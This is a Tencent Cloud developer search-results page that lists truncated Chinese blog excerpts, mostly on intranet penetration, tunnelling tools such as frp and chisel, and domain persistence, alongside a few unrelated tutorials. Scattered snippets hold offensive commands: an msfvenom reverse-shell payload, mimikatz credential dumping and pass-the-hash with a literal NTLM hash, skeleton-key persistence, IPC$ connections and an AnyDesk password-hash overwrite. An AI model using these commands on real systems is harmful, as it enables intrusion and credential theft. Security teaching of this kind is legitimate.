- 综合排序
- 最热优先
- 最新优先
- 来自专栏红队蓝军
cslab-lab9内网渗透
感谢@someb0dy提供的lab9wp,与大家进行分享 难度:简单 视频教程:https://www.bilibili.com/video/BV1u4j2zuEmk/ 仿真靶机地址: https:// case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 'prefix'=>'cmseasy_',//数据库表前缀 'encoding'=>'utf8',//编码 'type' => 'mysqli',//数据库类型 ), ); sliver (lab9) C:\phpstudy_pro\WWW\config flag1 ounter(lineounter(lineounter(lineounter(lineounter(line sliver (lab9) mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50 .## ^ ##.
43610编辑于 2025-05-27 - 来自专栏FreeBuf
内网穿透:Android木马进入高级攻击阶段
概述 近日,360烽火实验室发现有数千个样本感染了一种名为“DressCode”的恶意代码,该恶意代码利用实下流行的SOCKS代理反弹技术突破内网防火墙限制,窃取内网数据。 这种通过代理穿透内网绕过防火墙的手段在PC上并不新鲜,然而以手机终端为跳板实现对企业内网的渗透还是首见[1]。 (三)攻击FTP服务器的过程 攻击者想要窃取内网FTP服务器数据时,会首先发送CONNECT指令,处于内网中的SOCKS服务端接收到此命令后,会试图和FTP服务器建立一个控制流,如果FTP服务器响应此请求 这样攻击者就通过木马完成了对内网文件服务器的数据窃取。 以上攻击过程如下图所示: ? 图5黑客攻击FTP服务器,窃取数据的过程 四.总结建议 “DressCode”恶意代码穿透能力强,地域分布广泛,已成为对内网安全的一种新的潜在威胁,减除接入企业内网的智能终端设备所带来的安全威胁客不容缓
1.7K100发布于 2018-02-09 - 来自专栏FreeBuf
看我利用传真功能漏洞渗透进入企业内网
如今的传真技术被广泛集成于多功能一体打印机设备中,之后,家庭或企业通过以太网、WiFi、蓝牙等接口把这些一体机接入内网使用。当然,为了支持传真功能,这些一体机还连接了传统话务(PSTN)的电话线。 如果答案是“能”,那么通过这台受控打印机,就有可能深入向企业内网渗透。终于,经过漫长而乏味的研究,我们有了突破。 这样一来,打开了企业内网之门,也就什么可能都存在了,攻击者可以潜伏在多功能一体机中,向脆弱的企业内网电脑发起“永恒之蓝”漏洞攻击,或通过传真方式窃取内网电脑数据并向外回传。 实际上,如果能通过打印机来控制整个企业内网,那影响和威胁就就非常之大了。 由此,我们通过传真漏洞远程实现企业内网的多功能一体机入侵控制,并以此为据点,可向企业内网深入进行横向渗透。
1.8K10发布于 2018-09-21 - 来自专栏黑白天安全团队
内网渗透 | 内网穿透
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
5.1K60发布于 2020-03-10 - 来自专栏谢公子学安全
内网渗透 | 内网穿透
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
3.5K10编辑于 2022-01-19 - 来自专栏SpringBoot教程
WIN10启动报错按F9才能进入怎么修复?
win10 老系统非重装 mbr转了GPT 之后uefi引导修复后启动弹出这个 只有按F9才能进入系统 这种情况不重装系统怎么修复呢 解决办法: 右键开始-运行,输入 msconfig.exe,引导
88920编辑于 2023-02-16 - 来自专栏州的先生
9个动图带你进入PyQtGraph的强大可视化世界
PyQtGraph官方提供了很好的示例来供学习者了解PyQtGraph的功能,下面我们通过9个图形,来一窥PyQtGraph的可视化世界。 =(255,255,255,200)) # 添加一个线区域选择项目,起始区间在400到700 lr = pg.LinearRegionItem([400,700]) p8.addItem(lr) p9 = win.addPlot(title="放大区域选择") p9.plot(data2) # 更新绘图 def updatePlot(): p9.setXRange(*lr.getRegion( ), padding=0) # 更新区域选择 def updateRegion(): lr.setRegion(p9.getViewBox().viewRange()[0]) lr.sigRegionChanged.connect (updatePlot) p9.sigXRangeChanged.connect(updateRegion) updatePlot() if __name__ == '__main__': import
9.6K11发布于 2020-08-10 - 来自专栏安全小圈
内网基础篇——浅谈内网
内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?
2.4K40发布于 2020-05-26 - 来自专栏字节脉搏实验室
内网基础篇——浅谈内网
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?
1.9K40发布于 2020-05-25 - 来自专栏小生观察室
内网渗透之内网隧道构建
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
1.5K30发布于 2021-03-05 - 来自专栏白安全组
内网接收外网shell(内网穿透)
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
2K20编辑于 2022-12-01 - 来自专栏网络安全攻防
内网渗透之内网权限维持
文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 SYSTEM\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior项: 在这里需要介绍一下DSRM的三种登录方式,具体如下: 0:默认值,只有当域控制器重启并进入 net use \\dc\ipc$ "mimikatz" /user:hacke\administrator 之后可以看到已经与域控制器建立了连接,我们之后可以列c盘的目录看看: Empire框架 首先,进入 empire环境,再成功反弹一个agent之后,我们使用interact命令进入该agent并输入"usemodule"命令加载skeleton_keys模块,该模块通过PowerSploit的Invoke-Mimikatz.ps1 ,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM
1K10编辑于 2024-08-20 - 来自专栏红队蓝军
内网渗透之内网权限维持
NTLM Hash发现与krbtgt的已经同步了 privilege::debug token::elevate lsadump::sam 5、修改DSRM的登录方式 0:默认值,只有当域控制器重启并进入 分别输入以下命令: privilege::Debug sekurlsa::pth /domain:win2012 /user:administrator /ntlm:968f7362eca2705a4a9ff58e54680186
88010编辑于 2025-02-12 - 来自专栏HACK学习
内网渗透之_内网IPC$入侵
domain 7.查看域控制器 net group "domain controllers" /domain 8.查看企业管理组 net group "enterprise admins" /domain 9. 即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见
2K30发布于 2019-08-06 - 来自专栏HACK学习
内网渗透|Chisel内网穿透工具
三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机 socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。 这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的 socks流量实现对内网主机的访问。 (3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
13K21发布于 2021-03-03 - 来自专栏全栈程序员必看
进入mysql_怎么用cmd进入mysql
如何使用CMD命令行进入MySQL数据库?下面就和小编一起学习一下如何操作吧。 2、在CMD命令窗口敲入命令后按回车即可进入MySQL。 mysql -hlocalhost -uroot -p (注意这里的”-h”、”-u”、”-p”不能省略)进入mysql数据库,其中”-h”表示服务器名,localhost表示本地;”-u”为数据库用户名 注意如果您的MySQL没有安装在C盘下,先使用DOS命令进入MySQL的安装目录下的bin目录中。 方法如下:输入G:进入G盘),在输入cd G:\phpstudy\mysql\bin 进入到MySQL的bin目录下,才可以输入 mysql -hlocalhost -uroot -p 然后按回车键。
13K10编辑于 2022-06-30 - 来自专栏红蓝对抗
内网渗透|内网远程控制总结
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\
1.3K30编辑于 2023-08-10 - 来自专栏全栈程序员必看
内网渗透的步骤_内网渗透思路
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 一个是为了保障安全(内网与外网相隔绝),另一个就是资源共享,毕竟大家都是一条船上的人。SMB 协议就是用于实现各种资源的共享的,其中就包括IPC连接中的命名管道。 利用场景: 已拿下内网中一台主机的权限(webserver),掌握该主机的域用户名和密码,知道域内其他用户名。
5.5K30编辑于 2022-10-05 - 来自专栏HACK学习
内网渗透 | 内网中的信息收集
无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。 ,size,freespace /valuefsutil fsinfo drivesfsutil fsinfo volumeinfo C:|findstr "卷名" 查看卷名称,需要管理员权限9. %I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。 kerberos-sec-spn-search/ ldapsearch 详细介绍:渗透基础——活动目录信息的获取 https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9% 80%8F%E5%9F%BA%E7%A1%80-%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E%B7%E5%8F
3.4K31发布于 2020-08-27 - 来自专栏全栈程序员必看
FRP内网穿透_frp内网穿透原理
大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29 日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019 年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。 我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2.
3.9K40编辑于 2022-09-30
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号